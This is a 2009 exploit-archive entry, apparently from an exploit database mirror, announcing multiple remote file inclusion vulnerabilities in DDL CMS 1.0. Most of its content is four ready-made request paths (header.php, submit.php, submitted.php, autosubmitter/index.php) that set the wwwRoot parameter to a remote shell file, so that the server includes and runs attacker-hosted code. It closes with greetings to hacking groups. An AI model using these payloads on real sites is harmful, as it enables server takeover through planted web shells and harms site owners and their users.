[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities
# Published : 2009-09-21
# Author : HxH
# Previous Title : Joomla com_surveymanager SQL injection vulnerability - (stype)
# Next Title : Joomla com_jbudgetsmagic SQL injection vulnerability - (bid)


+============================================================+
|                                                            |
| DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities |
|                                                            |
+============================================================+
|                                                            |
| Author : HxH                                               |
|                                                            |
| E-Mail : HxH[at]live[dot]at                                |
|                                                            |
+------------------------------------------------------------+
|                                                            |
| Script : http://www.ddlcms.com/DDLCMS_v1.0.zip             |
|                                                            |
+------------------------------------------------------------+
|                                                            |
| Exploit :                                                  |
|                                                            |
| /header.php?wwwRoot=[Shell.txt?]                           |
|                                                            |
| /submit.php?wwwRoot=[Shell.txt?]                           |
|                                                            |
| /submitted.php?wwwRoot=[Shell.txt?]                        |
|                                                            |
| /autosubmitter/index.php?wwwRoot=[Shell.txt?]              |
|                                                            |
+============================================================+
|                                                            |
| Greetz : ~ JiKo ~ ThE X ~ TSH ~ All No-Exploit.com Members |
|                                                            |
+============================================================+

# www.Syue.com [2009-09-21]